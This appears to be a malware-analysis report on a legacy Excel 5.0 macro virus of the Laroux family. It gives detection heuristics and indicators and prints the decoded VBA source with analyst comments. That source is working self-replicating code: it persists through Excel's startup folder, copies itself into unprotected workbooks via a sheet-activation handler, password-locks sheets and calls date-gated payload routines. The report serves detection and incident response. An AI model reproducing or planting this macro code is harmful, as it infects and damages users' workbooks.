MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
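The file is identified as a malicious Excel 5.0 macro-virus, specifically 'Xls.Trojan.Uedasan-1', by multiple critical heuristics. The Auto_open macro attempts to copy itself to the Excel startup directory using a constructed filename that includes a random number, likely to evade detection (in the extracted script below, the random suffix is appended only when a workbook named "#1SLIDER.XLA" is already open). It also registers a sheet-activation handler ("scan") that copies its hidden macro sheet into other open workbooks whose structure is not protected. This behavior suggests an attempt to establish persistence or drop a second-stage payload.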
Heuristics 4
-
ClamAV: Xls.Trojan.Uedasan-1 | critical | CLAMAV_DETECTION — ClamAV detected this file as malware: Xls.Trojan.Uedasan-1
-
Excel 5 Laroux/Larou-CV macro-virus marker cluster | critical | OLE_XLS5_LAROUX_MACRO_VIRUS — Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
-
VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS — Document contains VBA macro code
-
Auto_Open macro | high | OLE_VBA_AUTO — Auto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22558 bytes |

SHA-256: 03c9d2fbf75e293355f3d35c506898740dfa8e619e12729d24bfd2bd6070d5e8
Detection

- ClamAV: Xls.Trojan.Uedasan-1
- Obfuscation or payload: unlikely
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = " A-TPC "
'
'
'
'
'
'
Option Explicit
' Analyst note: Id is the fixed workbook name this macro looks for, and saves
' itself under, in Excel's startup folder (see Auto_open). It is also the
' workbook prefix of the OnSheetActivate handler. A file of this name in the
' startup path is a usable host indicator.
Public Const Id As String = "#1SLIDER.XLA"
' Analyst note: m_id holds the name of the macro sheet/module. Auto_open and
' scan both build it from Chr() codes as " A-TPC " (leading and trailing space),
' matching the VB_Name attribute of this module.
Public m_id As String
' Analyst note: Auto_open runs when the infected workbook is opened. If no file
' named Id exists in Excel's startup folder, it creates a new workbook, copies
' the hidden macro sheet into it and saves it there under Id (with a random
' suffix if a workbook of that name is already open). In every case it then
' registers the scan routine as the application-wide sheet-activation handler.
Sub Auto_open()
Attribute Auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim chklog As Variant
Dim cpotting, wafer, idhld As String
Dim bookname, c4 As String
' nexts is not defined in the visible part of the listing; its effect is unknown here.
nexts
' Chr() concatenation builds the sheet name " A-TPC " instead of using a literal.
m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
' cpotting = Excel startup folder plus trailing path separator.
cpotting = Application.StartupPath & Application.PathSeparator
' make tries to create a directory from the first 25 characters of that path.
make cpotting
' Dir returns "" when the startup folder holds no file named Id, i.e. this
' Excel installation has not been infected yet.
wafer = Dir(cpotting & Id)
If UCase(wafer) = "" Then
' Screen updating is disabled so the following workbook operations are not drawn.
Application.ScreenUpdating = False
Workbooks.Add (xlWorksheet)
ActiveWindow.DisplayWorkbookTabs = False
' The macro sheet is unhidden only for the copy into the new workbook,
' then hidden again in the source workbook.
ThisWorkbook.Sheets(m_id).Visible = True
ThisWorkbook.Sheets(m_id).Copy before:=ActiveWorkbook.Sheets(1)
ThisWorkbook.Sheets(m_id).Visible = False
' Fixed document properties are written to the dropped workbook; these
' constant strings can serve as static detection indicators.
With ActiveWorkbook
.Title = "#$%#$%#$@#@##$$$####@@@#@##$%$%$%^"
.Subject = "«Ü.++I¤¦XJ-K_æ"
.Author = "@@!@!@!#$#$%^**&%#^%^***"
.Keywords = ">>>>>>>>>>>>>>>>>> F.Y."
.Comments = "+666.............13.............OMEN+"
End With
' Default save name is Id; Rnd() is appended only when a workbook named Id
' is already open, so the suffix is a name-collision fallback.
idhld = Id
For Each chklog In Application.Workbooks
If chklog.Name = Id Then
Randomize
idhld = Id & Rnd()
End If
Next
bookname = ActiveWorkbook.Name
' The current directory is saved and restored around the save operation.
c4 = CurDir()
ChDir Application.StartupPath
' The new workbook's window is hidden before it is saved.
ActiveWindow.Visible = False
' Persistence step: the workbook is written into the startup folder.
' CreateBackup:=True is requested for the saved file.
Workbooks(bookname).SaveAs filename:=cpotting & idhld, FileFormat:=xlNormal, CreateBackup:=True
ThisWorkbook.Sheets(1).Visible = False
ChDir c4
' NOTE(review): ScreenUpdating is set to False again here and is not
' re-enabled anywhere in the visible listing.
Application.ScreenUpdating = False
End If
' Replication trigger: scan in workbook Id is invoked on sheet activation.
' The handler always references Id, even when the file was saved as idhld.
Application.OnSheetActivate = Id & "!scan"
End Sub
' Analyst note: make attempts to create a directory named by the first 25
' characters of locat. All errors are suppressed by On Error Resume Next, so a
' failure (for example, the directory already exists) is silently ignored.
Private Sub make(ByVal locat As String)
On Error Resume Next
Err = 0
' Only the first 25 characters of the path are used, whatever its real length.
MkDir Left(locat, 25)
' Both the error path and the success path simply leave the procedure.
If Err <> 0 Then
Exit Sub
End If
End Sub
' Analyst note: coding returns True when any worksheet enumerated through
' Application.Worksheets holds the marker string in a specific cell. The Chr()
' sequences decode to the cell address "a16384" and the value "uedasan"
' (the same token as in the ClamAV detection name). scan treats a True result
' as a reason not to copy the macro sheet into the active workbook.
Private Function coding()
Dim TESTER As Range
Dim logentry As Variant
coding = False
For Each logentry In Application.Worksheets
' Range address assembled from character codes: "a16384".
Set TESTER = Worksheets(logentry.Name).Range(Chr(97) + Chr(49) + Chr(54) + Chr(51) + Chr(56) + Chr(52))
' Marker value assembled from character codes: "uedasan".
If TESTER = Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110) Then
coding = True
Exit For
End If
Next
End Function
' Analyst note: scan is the routine Auto_open registers as the OnSheetActivate
' handler. When the active workbook's structure is not protected and it
' carries neither a module named m_id nor the marker checked by coding, scan
' copies the macro sheet from workbook Id into it, password-protects the first
' sheet, hides the copied sheet and calls Status. Errors are suppressed throughout.
Sub scan()
Attribute scan.VB_ProcData.VB_Invoke_Func = " \n14"
Dim checking, chkstruc As Boolean
Dim no1, slider As String
Dim LOGNAME As Variant
checking = False
' Same Chr() construction as in Auto_open: " A-TPC ".
m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
On Error Resume Next
Err = 0
' If reading ProtectStructure raises an error, skip straight to the exit label.
chkstruc = ActiveWorkbook.ProtectStructure
If Err <> 0 Then GoTo placeb
' Workbooks with a protected structure are left alone.
If chkstruc = False Then
Application.ScreenUpdating = False
no1 = ActiveWorkbook.Name
' slider is assigned here but not used again in the visible listing.
slider = Workbooks(no1).Sheets(1).Name
' Module enumeration: checking records whether a module named m_id is already
' present. The other branches display message boxes naming other macro
' viruses when modules called "me" or "pldt", or modules with names of 25 or
' more characters, are found. No cleanup of those modules is visible here.
For Each LOGNAME In Application.Modules
If LOGNAME.Name = m_id Then
checking = True
ElseIf LOGNAME.Name = "me" Then
MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Laroux.DP'"
ElseIf LOGNAME.Name = "pldt" Then
MsgBox "WARNING : VIRUS DETECTED! NAME : 'MERALCO'"
ElseIf Len(LOGNAME.Name) >= 25 Then
MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Extras.A'"
End If
Next
If checking = False And Not coding Then
' Replication step: the macro sheet is copied from the startup workbook
' into the active workbook, ahead of its first sheet.
Workbooks(Id).Sheets(m_id).Copy before:=Workbooks(no1).Sheets(1)
' The first sheet is then protected; the Chr() codes decode to the
' password "uedasan", which responders need to unprotect affected sheets.
ActiveWorkbook.Sheets(1).Protect password:=Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110)
Workbooks(no1).Sheets(m_id).Visible = False
' Status applies the date/time checks that gate the payload routines.
Status
End If
End If
placeb:
' NOTE(review): ScreenUpdating is left False on exit in every path.
Application.ScreenUpdating = False
End Sub
' Analyst note: Status is a date/time trigger. The arithmetic hides two small
' constants: Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 works out
' to 4, and Int(Sqr(4 * 62) / 2.6) works out to 6 (hand-evaluated; confirm in a
' sandbox). DO_EVERYTHING and DO_SOMETHING are defined outside the visible,
' truncated part of the listing, so their effects cannot be stated from here.
Private Sub Status()
' Trigger 1: current month equals 4.
If Month(Now) = Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 Then
DO_EVERYTHING
End If
' Trigger 2: current month is 4 or later and the current hour is before 6.
If (Month(Now) >= Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 _
And Hour(Now) < Int(Sqr(4 * 62) / 2.6)) Then
DO_SOMETHING
End If
End Sub
P
... (truncated)
|
|||